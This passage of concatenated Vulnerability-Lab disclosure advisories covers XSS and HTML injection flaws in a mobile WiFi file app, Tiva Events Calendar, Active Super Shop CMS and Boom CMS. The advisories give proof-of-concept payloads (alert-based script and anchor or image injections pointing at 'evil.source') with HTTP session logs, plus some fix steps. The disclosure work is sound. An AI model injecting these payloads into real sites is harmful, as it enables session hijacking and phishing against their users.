non-persistent external redirects to malicious<br />source and non-persistent manipulation of affected application modules.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.<br />For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a><br />http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3<br />http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3<br />http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX<br /><br /><br />Vulnerable Sources: Execution Points<br /><table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td<br />style="vertical-align:top;"><table style="background-color: #FFA81E;<br />background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);<br />background-repeat: repeat-x; background-position:top;" width="700"<br />cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span<br />class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl<br />e style="background-color: #B2B2B2; background-image:<br />url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><br /><tbody><tr><td><span class="doob_medium_text">Cannot find file or<br />directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN<br />INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a<br />href="/">>>&nbsp;Back To<br />Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br><br />-<br /><li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><br /><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><br /><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><br /><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);<br />background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:<br />nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold"><br />&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><br /><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><br /><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I<br />-<br /><td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"<br />href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"<br />style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action',<br />'13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<br /><a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy",<br />"/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'<br />style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><br /><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: <br />none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"<br />title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:<br />none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"<br />title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table><br /><br /><br />---PoC Session Logs ---<br />http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E<br />GET: HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: text/xml<br />-<br />http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Cookie: treeview=0<br />Upgrade-Insecure-Requests: 1<br />GET: HTTP/1.1 200 OK<br />Cache-Control: no-store, no-cache, must-revalidate<br />Content-Type: text/html<br />-<br />http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E<br />GET: HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: text/xml<br /><br /><br />Security Risk:<br />==============<br />The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2276<br /><br /><br />Release Date:<br />=============<br />2023-07-05<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2276<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,<br />such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of<br />service businesses to get online reservations without any hassles.<br /><br />(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337 )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.<br /><br /><br />Affected Product(s):<br />====================<br />tiva_theme<br />Product: Tiva Events Calender - Calender PHP (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-04-03: Researcher Notification & Coordination (Security Researcher)<br />2021-04-04: Vendor Notification 1 (Security Department)<br />2021-06-24: Vendor Notification 2 (Security Department)<br />2021-07-13: Vendor Notification 3 (Security Department)<br />****-**-**: Vendor Response/Feedback (Security Department)<br />****-**-**: Vendor Fix/Patch (Service Developer Team)<br />****-**-**: Security Acknowledgements (Security Department)<br />2023-07-05: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser<br />to web-application requests from the application-side.<br /><br />The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject<br />own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the<br />frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible<br />to inject malformed client-side executable script code in get request to trigger a non-persistent execution.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects<br />to malicious source and persistent manipulation of affected frontend / backend application modules.<br /><br />Request Method(s):<br />[+] POST / GET<br /><br />Vulnerable Input(s):<br />[+] Name<br /><br />Vulnerable Parameter(s):<br />[+] name<br /><br />Affected Module(s):<br />[+] index.php (Frontend on Event Preview)<br />[+] edit.php (Backend on Edit ID)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Exploitation: Payload<br />%20"<img src="evil.source" onload=alert(document.domain)><br /><br /><br />Vulnerable Source: Frontend (Index)<br /><tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td><br /><td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)"><br /><span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td><br /><td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td><br /><td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr><br /><br /><br />Vulnerable Source: Backend (Edit ID)<br /><section class="panel"><br /><header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header><br /><div class="panel-body"><br /><div class="alert alert-success"><br /><button data-dismiss="alert" class="close close-sm" type="button"><br /><i class="fa fa-times"></i><br /></button>Report successfully saved.</div> <br /><form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data"><br /><div class="form-group"><br /><label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label><br /><div class="col-sm-8"><br /><input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required /><br /></div></div><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://tiva-cal.localhost:8080/admin/report/edit.php<br />Host: tiva-cal.localhost:8080<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683<br />Content-Length: 745<br />Origin:https://tiva-cal.localhost:8080<br />Connection: keep-alive<br />Referer:https://tiva-cal.localhost:8080/admin/report/edit.php<br />Cookie: PHPSESSID=76gqk14e1s6cce40hfj11<br />name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=<br />-<br />POST: HTTP/2.0 200 OK<br />server: nginx<br />content-type: text/html<br />content-length: 1283<br />etag: "503-53ed12f4ca761"<br />accept-ranges: bytes<br />strict-transport-security: max-age=15768000; includeSubDomains<br />-<br />https://tiva-cal.localhost:8080/admin/report/evil.source<br />Host: tiva-cal.localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: image/webp,*/*<br />Connection: keep-alive<br />Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222<br />Cookie: PHPSESSID=76gqk14e1s6cce40hfj11<br />-<br />GET: HTTP/2.0 200 OK<br />server: nginx<br />content-type: text/html<br />content-length: 1283<br />etag: "503-53ed12f4ca761"<br />accept-ranges: bytes<br />strict-transport-security: max-age=15768000; includeSubDomains<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be patched by the following steps ...<br />1. Encode and escape the name input field content on transmit via post method<br />2. Restrict the input field and disallow insert of special chars<br />3. Parse the output location on the index frontend via encode to sanitize and prevent the execute<br />4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2278<br /><br /><br />Release Date:<br />=============<br />2023-07-04<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2278<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.4<br /><br /><br />Vulnerability Class:<br />====================<br />Script Code Injection<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.<br /><br /><br />Affected Product(s):<br />====================<br />ActiveITzone<br />Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-08-20: Researcher Notification & Coordination (Security Researcher)<br />2021-08-21: Vendor Notification (Security Department)<br />2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2023-07-05: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.<br />The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.<br /><br />The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.<br />Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on<br />profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the<br />manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview<br />of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.<br /><br />Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and<br />persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] Manage Details<br /><br />Vulnerable Parameter(s):<br />[+] name<br />[+] phone<br />[+] address<br /><br />Affected Module(s):<br />[+] manage profile<br />[+] products branding<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Exploitation: Payload<br /><img src="https://[DOMAIN]/[PATH]/[PICTURE].*"><br /><br /><br />Vulnerable Source: manage_admin & branding<br /><div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;"><br /><div class="panel-heading"><br /><h3 class="panel-title">Manage Details</h3><br /></div><br /><form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8"><br /><div class="panel-body"><br /><div class="form-group"><br /><label class="col-sm-3 control-label" for="demo-hor-1">Name</label><br /><div class="col-sm-6"><br /><input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required"><br /></div></div><br /><div class="form-group"><br /><label class="col-sm-3 control-label" for="demo-hor-2">Email</label><br /><div class="col-sm-6"><br /><input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required"><br /></div></div><br /><div class="form-group"><br /><label class="col-sm-3 control-label" for="demo-hor-3"><br />Phone</label><br /><div class="col-sm-6"><br /><input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control"><br /></div></div><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/<br />Host: assm_cms.localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680<br />Content-Length: 902<br />Origin:https://assm_cms.localhost:8080<br />Connection: keep-alive<br />Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/<br />Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1<br />-<br />POST: HTTP/3.0 200 OK<br />content-type: text/html; charset=UTF-8<br />ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/<br />Host: assm_cms.localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br /><br /><br />Reference(s):<br />https://assm_cms.localhost:8080/shop/<br />https://assm_cms.localhost:8080/shop/admin/<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/<br />https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.<br /><br /><br />Security Risk:<br />==============<br />The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Boom CMS v8.0.7 - Cross Site Scripting Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2274<br /><br /><br />Release Date:<br />=============<br />2023-07-03<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2274<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.3<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life<br />easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.<br />It gives editors control but doesn't require any technical knowledge.<br /><br />(Copy of the Homepage:https://www.boomcms.net/boom-boom )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.<br /><br /><br />Affected Product(s):<br />====================<br />UXB London<br />Product: Boom v8.0.7 - Content Management System (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-07-24: Researcher Notification & Coordination (Security Researcher)<br />2022-07-25: Vendor Notification (Security Department)<br />2023-**-**: Vendor Response/Feedback (Security Department)<br />2023-**-**: Vendor Fix/Patch (Service Developer Team)<br />2023-**-**: Security Acknowledgements (Security Department)<br />2023-07-03: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise<br />browser to web-application requests from the application-side.<br /><br />The vulnerability is located in the input fields of the album title and album description in the asset-manager module.<br />Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.<br />After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.<br />The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse<br />the content by usage of a backslash. Thus does not have any impact to inject own malicious<br />java-scripts because of its only performed for double- and single-quotes to prevent sql injections.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent<br />external redirects to malicious source and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] assets-manager (album)<br /><br />Vulnerable Function(s):<br />[+] add<br /><br />Vulnerable Parameter(s):<br />[+] title<br />[+] description<br /><br />Affected Module(s):<br />[+] Frontend (Albums)<br />[+] Backend (Albums Assets)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Login to the application as restricted user<br />2. Create a new album<br />3. Inject a test script code payload to title and description<br />4. Save the request<br />5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution<br />6. Successful reproduce of the persistent cross site web vulnerability!<br /><br /><br />Payload(s):<br />><script>alert(document.cookie)</script><div style=1<br /><a onmouseover=alert(document.cookie)>test</a><br /><br /><br />--- PoC Session Logs (Inject) ---<br />https://localhost:8000/boomcms/album/35<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/json<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 263<br />Origin:https://localhost:8000<br />Connection: 